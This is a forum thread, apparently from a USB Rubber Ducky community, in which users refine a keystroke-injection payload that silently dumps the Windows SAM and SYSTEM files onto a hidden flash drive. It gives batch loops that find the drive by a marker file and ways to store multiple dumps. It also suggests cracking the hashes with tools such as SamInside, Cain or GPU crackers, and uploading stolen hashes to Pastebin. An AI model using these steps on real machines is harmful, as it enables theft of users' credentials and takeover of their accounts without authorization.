overwraith Posted October 30, 2012 Posted October 30, 2012 (edited) If you add a removable flash drive and USB hub to the duckey SAM attack (take em with you in your pocket + use the hub to plug in simultaneously) and add the file evac.txt to the flash drives root you can replace the CD <Directory> command in the SAM payload with this command which will auto-magically send the SAM file to the flash drive. If we ever get the mass storage firmware we wont even need the hub and flash drive. I am still testing this, so an additional delay may need added after this command. STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt cd %a:\ ) Edited February 6, 2013 by midnitesnake Corrected Formatting Quote
overwraith Posted October 31, 2012 Author Posted October 31, 2012 (edited) I spoke a little too soon, don't use CD for change directory as I did in the first post, use the following; for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: ) Edited February 6, 2013 by midnitesnake Corrected Formatting Quote
overwraith Posted October 31, 2012 Author Posted October 31, 2012 Looks like all the bugs were worked out with that last command. Anyone have some batch magic for renaming the SAM like the following; SAM --> SAM1 --> SAM2 --> SAM3 --> SAM4 ; So we can store multiple user SAM's without loosing the ones we have already collected? Also, does anyone have a program for brute forcing the password out of these SAM's? Quote
Xcellerator Posted November 6, 2012 Posted November 6, 2012 (edited) Nice! Theres been loads of great improvements on my original payload. The only thing that immediately comes to mind is creating folders for each SAM file (or just file names) based on %computername%. for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\%computername%.txt %a: ) And theres a free program called SamInside which can brute force SAM and SYSTEM files. It's not that fast, so it might be better to export the NTLM hashes into Cain or GPU cracker if you're one of those lucky people... Edited February 6, 2013 by midnitesnake Corrected Formatting Quote
Aprizm Posted November 7, 2012 Posted November 7, 2012 instead of creating a file you should append whatever you found to your .txt file. That way you will never lose the one you got before. have a file called Samdump.txt and just do this : samfile >> Samdump.txt Quote
overwraith Posted November 8, 2012 Author Posted November 8, 2012 Im glad people think this is cool, I will look into using SamInside or the export to NTLM hashes then cain or GPU cracker. As far as the methods of recording more than one SAM, I will look into both methods, the %computername%, and accumulating in a text file. I am a little worried with the accumulation into a text file that programs will have trouble reading the back to back encrypted data, but if all sam files are the same size, then it should'nt be a problem, as we can always parse the data via command filters/flags, or seperate it into other files later. Good points from everybody. Quote
Aprizm Posted November 18, 2012 Posted November 18, 2012 I dunno if this has been mentioned before but maybe pastebin could be used to drop the data once its been fetched. 1- get the hash 2-open browser in pastebin -> login pastebin -> paste the hash -> logout -> close browser 3- tada didnt try it but im pretty sure its doable. the reason why you wanna log in pastebin is so that you can easily access your paste once you go back home. Quote
Xcellerator Posted December 11, 2012 Posted December 11, 2012 If you take a look at a project called Nishang, which is a pen testing framework using powershell, I'm sure there was a payload that uses a pastebin account and the API to upload stolen information. Perhaps you could look into that. The same guy who wrote Nishang also wrote Kautilya which is a great HID pentesting framework for the Teensy boards, porting to the Ducky would be an interesting project... Quote
mrt0mat0 Posted January 20, 2013 Posted January 20, 2013 (edited) In case anyone is curious, I have my setup so that it uses both the evac.txt check and prior to running scripts, it creates a folder using computer name which works great for multiple attacks without overwriting(unless people have the same computer name). In theory you could loop through similar to the drive name to check for a file and append a number increasing until it has a free space, but meh. I'm currently using the twin duck and it works great for storing. then i just plug my sd into my linux system and use samdump. I'm having two weird issues and I'm not sure if they're related. First, the create part of vssown is failing due to an error, which i don't get the opportunity to copy and paste. next time i'll tweak it so it stops there and i can get the error or just remove the exit, as it's not necessary while i'm testing. The second part is that the SYSTEM file takes 5 minutes + to download to the flash drive. I'm not sure if this relates to the vssown or if it's because i'm copying back to a usb that's also handling the commands or if it's the size, which is only 28mb. It still works, but i'm prefer a *snap* done result. Edited January 20, 2013 by smacks Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.